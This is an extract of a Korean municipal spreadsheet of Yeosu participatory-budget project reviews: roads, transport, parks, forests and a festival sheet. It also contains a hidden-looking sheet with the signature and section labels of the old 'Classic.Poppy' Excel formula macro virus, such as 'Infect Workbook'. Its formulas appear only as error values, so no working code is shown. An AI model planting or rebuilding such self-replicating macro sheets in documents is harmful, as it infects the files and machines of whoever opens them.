A185: 181 | B185: 도로과 | C185: 산단로(삼동~남수) 확장 | D185: 3450 | E185: 주삼동 | F185: 700 | G185: 여수국가산단 진입부 병목구간 정체로 출퇴근 차량불편 초래 | H185: 원안가결 | I185: 30 | J185: 30 | K185: =IF(I185=J185,"맞음","틀림") -> 맞음
A186: 182 | B186: 도로과 | C186: 율촌 초등학교~중학교 도로 개설 | D186: 550 | E186: 율촌면 | F186: 255 | G186: 동양엔파트에서 율촌면소재지까지 도로의 버스통행이 어려워 추가 도로개설 | H186: 원안가결 | I186: 15 | J186: 15 | K186: =IF(I186=J186,"맞음","틀림") -> 맞음
A187: 183 | B187: 도로과 | C187: 무선~반월 도시계획 도로 개설 | D187: 200 | E187: 여천동 | F187: 470 | G187: 교통체증이 심한 반월마을 입구 도로개설로 주민교통편의 제공 | H187: 원안가결 | I187: 16 | J187: 16 | K187: =IF(I187=J187,"맞음","틀림") -> 맞음
A188: 184 | B188: 도로과 | C188: 봉강동 벅수골 도로 개설 | D188: 467 | E188: 봉강동 | F188: 191 | G188: 도시계획도로 개설로 긴급 재난대비 및 주민교통편의 제공 | H188: 원안가결 | I188: 3 | J188: 3 | K188: =IF(I188=J188,"맞음","틀림") -> 맞음
A189: 185 | B189: 도로과 | C189: 광무동 럭키아파트∼진남초교 도로 개설 | D189: 480 | E189: 광무동 | F189: 225 | G189: 도시계획 도로개설로 긴급 재난대비 및 주민교통편의 제공 | H189: 원안가결 | I189: 4 | J189: 4 | K189: =IF(I189=J189,"맞음","틀림") -> 맞음
A190: 186 | B190: 도로과 | C190: 무선~여천초등학교 도로 개설 | D190: 3500 | E190: 여천동 | F190: 1060 | G190: 간선도로망 확충으로 무선 및 석창방면 교통체증 해소 | H190: 원안가결 | I190: 9 | J190: 9 | K190: =IF(I190=J190,"맞음","틀림") -> 맞음
A191: 187 | B191: 도로과 | C191: 진두~조선소 도로 개설 | D191: 2000 | E191: 돌산읍 | F191: 2000 | G191: 지역주민의 오랜 숙원사업해결 및 사회간접자본 확충으로 지역 균형발전 도모 | H191: 원안가결 | I191: 5 | J191: 5 | K191: =IF(I191=J191,"맞음","틀림") -> 맞음
A192: 188 | B192: 도로과 | C192: 봉산동 도로(소로2-325) 개설 | D192: 200 | E192: 대교동 | F192: 55 | G192: 도시계획 도로개설로 긴급 재난대비 및 주민교통편의 제공 | H192: 원안가결 | I192: 6 | J192: 6 | K192: =IF(I192=J192,"맞음","틀림") -> 맞음
A193: 189 | B193: 도로과 | C193: 삼산면 초도 대동마을 진입로 확장 | D193: 200 | E193: 삼산면 | F193: 100 | G193: 농어촌도로의 위험구간 도로확장으로 교통사고 사전예방 | H193: 원안가결 | I193: 46 | J193: 46 | K193: =IF(I193=J193,"맞음","틀림") -> 맞음
A194: 190 | B194: 도로과 | C194: 덕양~봉두 도로 확장 | D194: 1500 | E194: 소라면 | F194: 2540 | G194: 주민불편사항 해소 및 지역주민 숙원사업 해결 | H194: 원안가결 | I194: 40 | J194: 40 | K194: =IF(I194=J194,"맞음","틀림") -> 맞음
A195: 191 | B195: 도로과 | C195: 도로 교행지 개설 | D195: 500 | E195: 관내 | F195: 교행지 20개소 | G195: 미 개설된 군도, 농어촌도로에 교행지를 설치버스 및 차량 통행 시 불편 완화 | H195: 원안가결 | I195: 7 | J195: 7 | K195: =IF(I195=J195,"맞음","틀림") -> 맞음
A196: 192 | B196: 도로과 | C196: 묘도 창촌 도시계획 도로 개설 | D196: 3000 | E196: 묘도동 | F196: 1200 | G196: 도시계획도로개설로 긴급재난 대비 주민교통편의 제공 | H196: 원안가결 | I196: 35 | J196: 35 | K196: =IF(I196=J196,"맞음","틀림") -> 맞음
A197: 193 | B197: 도로과 | C197: 문수동 음달마을 도로 개설 | D197: 200 | E197: 문수동 | F197: 480 | G197: 소방도로 개설로 화재 등 긴급재난대비 및 교통편의 제공 | H197: 원안가결 | I197: 12 | J197: 12 | K197: =IF(I197=J197,"맞음","틀림") -> 맞음
A198: 194 | B198: 도로과 | C198: 율촌제1산단~율촌면소재지 도로 개설 | D198: 2000 | E198: 율촌면 | F198: 900 | G198: 율촌1산단과 인접한 진입도로가 없어 산단종사자의 접근 기피 | H198: 원안가결 | I198: 26 | J198: 26 | K198: =IF(I198=J198,"맞음","틀림") -> 맞음
A199: 195 | B199: 도로과 | C199: 동문우체국~자산공원 도로 개설 | D199: 500 | E199: 동문동 | F199: 1200 | G199: 학생들의 통학로가 매우 협소하여 차량통행에 따른 보행자들의 안전 사고위험요인 해소 및 자산공원 주차장 버스진입을 위한 도로 확충 | H199: 원안가결 | I199: 10 | J199: 10 | K199: =IF(I199=J199,"맞음","틀림") -> 맞음
A200: 196 | B200: 도로과 | C200: 진남관~여수공고 도로 개설 | D200: 1000 | E200: 충무동 | F200: 425 | G200: 도시기반시설 확충으로 주거 밀집 지역 주민생활 환경개선 | H200: 원안가결 | I200: 11 | J200: 11 | K200: =IF(I200=J200,"맞음","틀림") -> 맞음
A201: 197 | B201: 도로과 | C201: 봉산동 도시계획도로(자동차매매상사인근)개설 | D201: 1000 | E201: 대교동 | F201: 382 | G201: 도시계획 도로개설로 긴급 재난대비 및 주민교통편의 제공 | H201: 원안가결 | I201: 19 | J201: 19 | K201: =IF(I201=J201,"맞음","틀림") -> 맞음
A202: 198 | B202: 도로과 | C202: 모사금 해수욕장 진입도로 개설 | D202: 800 | E202: 만덕동 | F202: 510 | G202: 도시계획 도로개설로 긴급 재난대비 및 주민교통편의 제공 | H202: 원안가결 | I202: 27 | J202: 27 | K202: =IF(I202=J202,"맞음","틀림") -> 맞음
A203: 199 | B203: 도로과 | C203: 만흥동 시도 확·포장 | D203: 1000 | E203: 만덕동 | F203: 300 | G203: 협소한 도로를 확장하여 주민생활 및 교통불편 해소 | H203: 원안가결 | I203: 17 | J203: 17 | K203: =IF(I203=J203,"맞음","틀림") -> 맞음
A204: 200 | B204: 도로과 | C204: 만흥~오천 도로 개설 | D204: 2000 | E204: 만덕동 | F204: 2300 | G204: 사회기반시설 확충으로 물류비용 절감 및 도시 경쟁력 확보 | H204: 원안가결 | I204: 47 | J204: 47 | K204: =IF(I204=J204,"맞음","틀림") -> 맞음
A205: 201 | B205: 도로과 | C205: 만흥동 마래터널 앞 도로 확장 | D205: 500 | E205: 만덕동 | F205: 330 | G205: 관광지 주변도로가 협소하여 교통소통에 지장이 많을 뿐만 아니라 안전사고 위험 상존 | H205: 원안가결 | I205: 8 | J205: 8 | K205: =IF(I205=J205,"맞음","틀림") -> 맞음
A206: 202 | B206: 도로과 | C206: 돌산읍 상하동 도로 확장 | D206: 1700 | E206: 돌산읍 | F206: 1000 | G206: 마을 진입도로 폭이 협소하여 차량 교행 및 관광버스 통행 곤란 | H206: 원안가결 | I206: 13 | J206: 13 | K206: =IF(I206=J206,"맞음","틀림") -> 맞음
A207: 203 | B207: 도로과 | C207: 미평공영주차장 주변 도로 확장 | D207: 400 | E207: 미평동 | F207: 120 | G207: 미평동 공영주차장 활성화 및 우범지역 도로정비로 주민생활 환경 개선 | H207: 원안가결 | I207: 20 | J207: 20 | K207: =IF(I207=J207,"맞음","틀림") -> 맞음
... A248: 244 | B248: 도로과 | C248: 돌산읍 굴전~진모 도로 확장 | D248: 30 | E248: 돌산읍 | F248: 1300 | G248: 굴전캠핑장 및 해안도로를 찾는 이용객의 불편의 초래하고 있어 이를 해소 | H248: 원안가결 | I248: 65 | J248: 65 | K248: =IF(I248=J248,"맞음","틀림") -> 맞음
A249: 245 | B249: 건축과 | C249: 빈집 정비사업 | D249: 80 | E249: 읍면동 | F249: 40동 | G249: 방치건축물 철거 지원을 통해 쾌적한 주거환경 조성 및 도시미관 개선 | H249: 원안가결 | I249: 2 | J249: 2 | K249: =IF(I249=J249,"맞음","틀림") -> 맞음
A250: 246 | B250: 건축과 | C250: 한옥 보조금 지원 | D250: 200 | E250: 읍면동 | F250: 10동 | G250: 한옥 신개축 지원을 통해 도시미관 개선 및 관광 활성화 | H250: 원안가결 | I250: 3 | J250: 3 | K250: =IF(I250=J250,"맞음","틀림") -> 맞음
A251: 247 | B251: 건축과 | C251: 공동주택단지 보조사업 | D251: 1348 | E251: 노후아파트단지 | F251: 1식 | G251: 아파트내 부대 복리설 개보수 지원으로 쾌적한 생활환경 조성 및 주민부담 경감 | H251: 원안가결 | I251: 1 | J251: 1 | K251: =IF(I251=J251,"맞음","틀림") -> 맞음
A252: 248 | B252: 교통행정과 | C252: 시내버스 현금자동집계시스템 유지 보수 | D252: 66 | E252: 시내버스 180대 | F252: 운전자조작기 180대 통합요금징수기 180대 집계시스템 및 수입금 통합관리 프로그램 6대 | G252: 현금수입의 투명성 및 재정지원의 신뢰성 제고 | H252: 원안가결 | I252: 1 | J252: 1 | K252: =IF(I252=J252,"맞음","틀림") -> 맞음
A253: 249 | B253: 교통행정과 | C253: 교통신호기 유지보수공사 | D253: 248 | E253: 326개 교차로 | F253: 신호등 설치개소 326개소, 안전시설물 422조 | G253: 신호등 고장 시 현장 즉시 대처로 교통사고 사전 예방 | H253: 원안가결 | I253: 4 | J253: 4 | K253: =IF(I253=J253,"맞음","틀림") -> 맞음
A254: 250 | B254: 교통행정과 | C254: 교통신호등 설치공사 | D254: 99 | E254: 교통안전시설 심의위원회 선정 2개소 | F254: 2개 교차로 | G254: 교통사고 사전 예방 및 보행자 통행로 확보로 시민편의 제공 | H254: 원안가결 | I254: 5 | J254: 5 | K254: =IF(I254=J254,"맞음","틀림") -> 맞음
A255: 251 | B255: 교통행정과 | C255: 횡단보도 조명등 설치공사 | D255: 49 | E255: 여수경찰서 선정 10개소 | F255: 횡단보도 10개소 | G255: 보행자 횡단 시 차량 운전자들에게 시인성을 제공하여 교통사고 예방 | H255: 원안가결 | I255: 6 | J255: 6 | K255: =IF(I255=J255,"맞음","틀림") -> 맞음
A256: 252 | B256: 교통행정과 | C256: 버스정보시스템(BIS) 설치공사 | D256: 198 | E256: 웅천지웰아파트 등 20개소 | F256: 버스승강장 단말기 20개소 | G256: 설치요구 민원 다수 | H256: 원안가결 | I256: 3 | J256: 3 | K256: =IF(I256=J256,"맞음","틀림") -> 맞음
A257: 253 | B257: 교통행정과 | C257: 버스정보시스템 버스내 단말기(OBE) 교체공사 | D257: 241 | E257: 시내버스 180대 | F257: 버스내단말기 (OBE) 180대 | G257: 버스정보시스템 버스내단말기(OBE) 노후화로 교체 | H257: 원안가결 | I257: 2 | J257: 2 | K257: =IF(I257=J257,"맞음","틀림") -> 맞음
A258: 254 | B258: 도로관리사업소 | C258: 도로 정비 및 유지관리사업 | D258: 1000 | E258: 시내도로 | F258: L=10㎞, B=8~24m | G258: 포장노면 균열, 요철, 노후불량 구간 등 도로정비로 사고예방 및 도로이용불편 해소 | H258: 원안가결 | I258: 3 | J258: 3 | K258: =IF(I258=J258,"맞음","틀림") -> 맞음
A259: 255 | B259: 도로관리사업소 | C259: 여수 국가산단내 도로 재포장공사 | D259: 400 | E259: 중흥동일원 | F259: L=4㎞, B=8~24m | G259: 포장노면 균열, 요철, 노후불량 구간 등 도로정비로 사고예방 및 도로이용불편 해소 | H259: 원안가결 | I259: 7 | J259: 7 | K259: =IF(I259=J259,"맞음","틀림") -> 맞음
A260: 256 | B260: 도로관리사업소 | C260: 화정면 리도201호선 재포장공사 | D260: 100 | E260: 화정면 (개도) | F260: L=1.5㎞, B=7m | G260: 기존 도로노면 균열 및 침하구간 정비 등으로 도로이용 불편해소 | H260: 원안가결 | I260: 24 | J260: 24 | K260: =IF(I260=J260,"맞음","틀림") -> 맞음
... A308: 304 | B308: 도시재생과 | C308: 해안포장마차촌 조성 | D308: 500 | E308: 중앙동주민센터, 하멜공원 일원 | F308: 1식 | G308: 야경이 아름다운 여수 밤바다와 연계한 활력있는 밤 문화공간 창조 필요 | H308: 원안가결 | I308: 3 | J308: 3 | K308: =IF(I308=J308,"맞음","틀림") -> 맞음
A309: 305 | B309: 공영개발과 | C309: 웅천마을 망향비 건립사업 | D309: 150 | E309: 웅천동 1678-8 | G309: 웅천택지개발사업 지구로 편입돼 사라진 5개마을 주민들을 위로 | H309: 원안가결 | I309: 1 | J309: 1 | K309: =IF(I309=J309,"맞음","틀림") -> 맞음
A310: 306 | B310: 산림과 | C310: 둘레길 정비사업 | D310: 150 | E310: 고락산 등6개소 둘레길 | F310: 10km | G310: 도심권 많은 시민들이 즐겨찾는 둘레길 정비사업 시행으로 통행불편해소 및 쾌적하고 안전한 숲길서비스 제공 | H310: 원안가결 | I310: 4 | J310: 4 | K310: =IF(I310=J310,"맞음","틀림") -> 맞음
A311: 307 | B311: 산림과 | C311: 산림욕장 장애우 진입데크 설치사업 | D311: 150 | E311: 미평동 산21-1 | F311: L=150m | G311: 장애우 등 거동이 불편한 사람도 휠체 어를 타고 이동할 수 있도록 계단없는 데크로드 조성 | H311: 원안가결 | I311: 3 | J311: 3 | K311: =IF(I311=J311,"맞음","틀림") -> 맞음
A312: 308 | B312: 산림과 | C312: 산림욕장 수변데크 설치사업 | D312: 225 | E312: 미평동 산21-1 | F312: L=170m | G312: 저수지 주변 수변데크 설치하여 새로 운 볼거리, 즐길거리 제공 | H312: 원안가결 | I312: 2 | J312: 2 | K312: =IF(I312=J312,"맞음","틀림") -> 맞음
A313: 309 | B313: 산림과 | C313: 산림욕장 및 산림공원 정비사업(도색작업 등) | D313: 30 | E313: 미평동 산21-1 | F313: 관리사무소, 화장실, 정자4동, 체육시설 등 | G313: 산림공원 및 산림욕장 내 각종 시설물에 대한 도색 및 정비가 시급한 상태로 일제정비 하여 이용객들에게 불편해소 및 쾌적한 산림휴양서비스 제공 | H313: 원안가결 | I313: 5 | J313: 5 | K313: =IF(I313=J313,"맞음","틀림") -> 맞음
A314: 310 | B314: 산림과 | C314: 봉황산 자연휴양림 사유토지 매입 | D314: 200 | E314: 돌산읍 신복리 산391-14 | F314: 5필지(A=11,280㎡) | G314: 봉황산 자연휴양림 내 오토캠핑장 조성으로 시민 및 관광객에게 편리하고 쾌적한 숲속 야영공간 제공 | H314: 원안가결 | I314: 1 | J314: 1 | K314: =IF(I314=J314,"맞음","틀림") -> 맞음
A315: 311 | B315: 산림과 | C315: 휴양림, 휴양관 목재시설물 방부처리 | D315: 30 | E315: 돌산읍 신복리 산391 | F315: 숲속의 집 12동, 휴양관 1동 등 | G315: 휴양림 내 조성된 시설물 및 건물 외부 방부목 도색 사업으로 내구연한 연장 | H315: 원안가결 | I315: 6 | J315: 6 | K315: =IF(I315=J315,"맞음","틀림") -> 맞음
A316: 312 | B316: 공원과 | C316: 국가산단내 가로수 및 가로화단정비사업(30㎞) | D316: 70 | E316: 화치동 | F316: 30㎞ | G316: 국도국제도시건설의 꿈을 실현하기 위해 국가산단내 녹지 및 가로수, 가로화단 환경 정비사업 시행 | H316: 원안가결 | I316: 1 | J316: 1 | K316: =IF(I316=J316,"맞음","틀림") -> 맞음
A317: 313 | B317: 공원과 | C317: 도심지 및 국도17호선 주변 화단 정비사업(0.90%) | D317: 70 | E317: 도심지(신월로 등 5개소) 및 국도 17호선 일원 | F317: 25.5km | G317: 국도국제도시건설의 꿈을 실현하기 위해 도심지 및 국도 17호선 일원의 가로화단과 중앙분리대 환경정비사업 시행 | H317: 원안가결 | I317: 2 | J317: 2 | K317: =IF(I317=J317,"맞음","틀림") -> 맞음
A318: 314 | B318: 공원과 | C318: 중앙로 중앙분리대 보식(종려 등)사업 | D318: 70 | E318: 여수시 중앙로 중앙분리대 일원 | F318: 홍가시, 종려 등 보식 - 3,000주 | G318: 중앙분리대 홍가시 등 보식으로 아름다운 도심 공간 조성 시민숙원사업 해결로 쾌적한 복지환경 제공 | H318: 원안가결 | I318: 3 | J318: 3 | K318: =IF(I318=J318,"맞음","틀림") -> 맞음
A319: 315 | B319: 공원과 | C319: 묘도대교~이순신대교 가로화단 조성사업 | D319: 200 | E319: 여수시 묘도대교~이순신대교간 | F319: 가로화단 조성- 2.0km(동백,후박 등 식재-3,000주) | G319: 가로수 설치로 주민 휴식공간 제공 | H319: 원안가결 | I319: 4 | J319: 4 | K319: =IF(I319=J319,"맞음","틀림") -> 맞음
A320: 316 | B320: 공원과 | C320: 돌산읍 죽포~두문마을간 가로수 조성사업 | D320: 50 | E320: 여수시 돌산읍 죽포리 | F320: 가로수 설치 1식 | G320: 가로수 설치로 주민 휴식공간 제공 주민숙원사업 해결로 쾌적한 복지환경 제공 | H320: 원안가결 | I320: 5 | J320: 5 | K320: =IF(I320=J320,"맞음","틀림") -> 맞음
A321: 317 | B321: 공원과 | C321: 가로수 전정사업(대형목) | D321: 35 | E321: 시내일원(쌍봉로, 시청로, 선소로 등) | F321: 350본(대형목) | G321: 국제도시건설의 꿈을 실현하기 위해 가로수 전정사업실시로 민원해소 및 쾌적한 도로환경 제공 | H321: 원안가결 | I321: 6 | J321: 6 | K321: =IF(I321=J321,"맞음","틀림") -> 맞음
... A376: 372 | B376: 공원과 | C376: 좌수영로~엑스포대로간 중앙분리대 보식사업 | D376: 50 | E376: 여수시 좌수영로~엑스포대로 일원 | F376: 동백 등 보식-64본 | G376: 여수로 진입하는 시작 구간으로 중앙분리대 철쭉 등을 보식하여 아름다운 도심 공간 조성 | H376: 원안가결 | I376: 61 | J376: 61 | K376: =IF(I376=J376,"맞음","틀림") -> 맞음

Sheet VXXXXXXX
A1: 관광문화분과.xls | C1: FALSE
A2: Book1
A3: C:\Program Files\Microsoft Office\OFFICE11\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: 3 | C4: FALSE
C5: #NAME?
C6: FALSE
A7: Classic.Poppy by VicodinES | C7: #NAME?
A8: With Lord Natas | C8: #NAME?
A9: An Excel Formula Macro Virus (XF.Classic) | C9: #NAME?
A10: Hydrocodone/APAP 10-650 For Your Computer | C10: FALSE
A11: (C) The Narkotic Network 1998 | C11: FALSE
C12: FALSE
C13: FALSE
A14: **Simple Payload** | C14: #NAME?
A15: FALSE
A16: FALSE
A17: #NAME? | C17: **Set Our Values and Paths**
C18: #NAME?
C19: #NAME?
A20: **Add New Workbook, Infect It, Save It As Book1.xls** | C20: #NAME?
A21: #NAME? | C21: #NAME?
A22: #NAME? | C22: #NAME?
A23: FALSE | C23: #NAME?
A24: #NAME?
A25: #NAME?
A26: FALSE | C26: **Infect Workbook**
A27: FALSE | C27: FALSE
A28: FALSE | C28: #NAME?
A29: FALSE | C29: FALSE
A30: FALSE | C30: #NAME?
A31: FALSE | C31: #NAME?
A32: FALSE | C32: FALSE
A33: FALSE | C33: FALSE
A34: FALSE | C34: FALSE
A35: FALSE | C35: #NAME?
A36: FALSE | C36: #NAME?
A37: FALSE
A38: FALSE
A39: FALSE | C39: #NAME?
A40: FALSE | C40: FALSE
A41: #NAME? | C41: #NAME?

Sheet 행사축제
A1: [행사축제성]
A2: 주민참여예산제 행정지원분과위원회 검토결과서
A4: 연번 | B4: 소관 부서 | C4: 사업명 | D4: 사업비 (백만원) | E4: 위치 | F4: 사업량 | G4: 필요성 | H4: 분과위원회 점수 | I4: 주관부서 우선순위 | J4: 분과위 우선순위
A5: 계 | C5: 1건 | D5: 40
A6: 1 | B6: 체육지원과 | C6: 제26회 전국 남녀 중고 배구대회개최 | D6: 140 | E6: 진남체육관외 보조경기장 | F6: 51개팀,1,600명 | G6: 전국규모 대회 개최로 박람회 이후 위축된도시 기능 활성화 도모 | H6: 80.2(우수) | I6: 1
A7: 1 | B7: 체육지원과 | C7: 2015 회장기 전국 유도 대회(국가대표 선발전 겸)개최 | D7: 130 | E7: 진남체육관 | F7: 전국초중고, 일반부팀 1,700명 | G7: 2016년 국가대표 선발전울 겸하는 인지도있는 대회로 개최시 우리시 브랜드 가치 상승 효과 기대 | H7: 77.8(보통) | I7: 2
H12: `
